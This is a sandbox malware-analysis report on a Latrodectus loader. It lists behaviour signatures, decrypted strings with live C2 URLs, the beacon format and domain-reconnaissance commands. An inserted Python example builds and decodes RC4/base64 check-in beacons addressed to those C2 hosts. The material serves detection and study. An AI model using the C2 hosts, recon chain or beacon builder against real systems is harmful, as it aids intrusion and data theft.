Windows Analysis Report
Document_a51_19i793302-14b09981a5569-3684u8.js

Overview

General Information

Sample name: Document_a51_19i793302-14b09981a5569-3684u8.js
Analysis ID: 1432364
MD5: b5c04c9ce0a3da2e16e97632e13b5e28
SHA1: 00303f1b540e92a79488fd9b603c5e987cee3734
SHA256: 71a429fdbaa04f8eee80c05b123ba00635569801ca041fdc7c6ac41de8aa72d3
Tags: js
Infos:

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection

Source: 5.2.rundll32.exe.235b5ce0000.2.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Source: :wtfbbq (copy) ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\sharepoint\360total.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll ReversingLabs: Detection: 18%
Source: Document_a51_19i793302-14b09981a5569-3684u8.js ReversingLabs: Detection: 18%
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c ipconfig /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c systeminfo
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c nltest /domain_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net view /all /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net view /all
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &ipconfig=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c net config workstation
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /c whoami /groups
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &systeminfo=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain_trusts=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain_trusts_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_view_all_domain=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_view_all=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &wmic=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_config_ws=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &net_wmic_av=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &whoami_group=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &proclist=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "pid":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%d",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "proc":
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s",
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "subproc": [
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &desklinks=[
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: *.*
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Update_%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Custom_update
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Updater
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: rundll32.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: "%s", %s %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: runnung
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: :wtfbbq
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: files/bp.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s\%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %d.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s\%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: init -zzzz="%s\%s"
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: front
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: /files/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Facial
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: !"$%&()*wp
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: .exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: POST
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: GET
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: curl/7.88.1
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: URLS
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: COMMAND
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: ERROR
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: <html>
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: <!DOCTYPE
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%d.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: 12345
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &stiller=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %s%d.exe
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: LogonTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %x%x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: TimeTrigger
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: PT0H%02dM
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &mac=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: :%02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: PT0S
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &computername=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: &domain=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \*.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \Registry\Machine\
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: https://jarinamaers.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: https://startmast.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Desktop
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Startup
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Personal
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Local AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: \update_data.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack String decryptor: URLS|%d|%s
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 5_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_0000018010315E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor, 6_3_0000018010315E5C
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr
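The decrypted strings above spell out the shape of the Latrodectus check-in: a printf-style registration string (counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s), optional "&ipconfig=", "&systeminfo=", "&whoami_group=" fields carrying discovery output, a base64 alphabet, the Classification note that requests are RC4-encrypted, and a POST with Content-Type application/x-www-form-urlencoded to one of the two /live/ URLs under the forged user-agent. The block below is an added example, not code from the report or from the malware's authors, that models that pipeline so the same functions can build a test beacon or decode a captured body. Two assumptions are labelled in the code: that the string "12345" from the list is the RC4 key (the report shows the string but not its purpose), and that the POST body is bare base64 text. The sample field values are constructed.

```python
"""
Added example (not code from the report or from the malware's authors): models the
Latrodectus check-in body the way the decrypted strings above lay it out, so the
same functions can build a test beacon or decode a captured one.
"""
import base64
from typing import Dict, Optional

# Recovered by the report's string decryptor.
C2_URLS = ("https://jarinamaers.shop/live/", "https://startmast.shop/live/")
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)"

# Field order of the decrypted registration format string:
# counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
REGISTRATION_ORDER = ("counter", "type", "guid", "os", "arch", "username",
                      "group", "ver", "up", "direction")

# Keys the loader appends as "&<key>=<command output>" (also from the string list).
RECON_KEYS = frozenset({"ipconfig", "systeminfo", "domain_trusts", "domain_trusts_all",
                        "net_view_all_domain", "net_view_all", "net_group", "wmic",
                        "net_config_ws", "net_wmic_av", "whoami_group", "mac",
                        "computername", "domain", "stiller", "proclist", "desklinks"})

# ASSUMPTION: the report lists "12345" among the decrypted strings but does not say
# what it is for. This example treats it as the RC4 key; substitute the key you
# recover from your own sample.
ASSUMED_RC4_KEY = b"12345"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling, then keystream XOR); one function both
    encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_plaintext(registration: Dict[str, object],
                    recon: Optional[Dict[str, str]] = None) -> str:
    """Join the fields exactly as the printf-style format does: no URL-encoding,
    which is also why command output containing '&' would corrupt a real beacon."""
    missing = [k for k in REGISTRATION_ORDER if k not in registration]
    if missing:
        raise ValueError(f"registration fields missing: {missing}")
    parts = [f"{k}={registration[k]}" for k in REGISTRATION_ORDER]
    for k, v in (recon or {}).items():
        if k not in RECON_KEYS:
            raise ValueError(f"unknown recon key {k!r}")
        parts.append(f"{k}={v}")
    return "&".join(parts)


def encode_beacon(registration: Dict[str, object], recon: Optional[Dict[str, str]] = None,
                  key: bytes = ASSUMED_RC4_KEY) -> str:
    """plaintext -> RC4 -> base64: the POST body as it would appear on the wire
    (assumed layout: bare base64 text under application/x-www-form-urlencoded)."""
    return base64.b64encode(rc4(key, build_plaintext(registration, recon).encode())).decode()


def decode_beacon(body: str, key: bytes = ASSUMED_RC4_KEY) -> Dict[str, str]:
    """Reverse the pipeline and split the k=v pairs (split on the first '=', so a
    value may contain '=' but never '&')."""
    plaintext = rc4(key, base64.b64decode(body)).decode("utf-8", errors="replace")
    fields: Dict[str, str] = {}
    for pair in plaintext.split("&"):
        k, _, v = pair.partition("=")
        fields[k] = v
    return fields


# Constructed sample values; they are not taken from the report's traffic. The guid
# follows the %04X%04X%04X%04X%08X%04X layout seen in the decrypted strings.
SAMPLE_REGISTRATION = {"counter": 1, "type": 1, "guid": "1A2B3C4D5E6F7A8B0000ABCD1234",
                       "os": 10, "arch": 64, "username": "user", "group": 1234567890,
                       "ver": "1.1", "up": 4, "direction": C2_URLS[0]}
SAMPLE_RECON = {"whoami_group": "Everyone\nBUILTIN\\Users", "computername": "DESKTOP-1"}

if __name__ == "__main__":
    body = encode_beacon(SAMPLE_REGISTRATION, SAMPLE_RECON)
    print("User-Agent:", USER_AGENT)
    print("body:", body)
    print("decoded:", decode_beacon(body))
```

If the key assumption is wrong for a given capture, decode_beacon will still run but return garbage keys; the quickest sanity check is that the first decoded key comes out as "counter".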

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
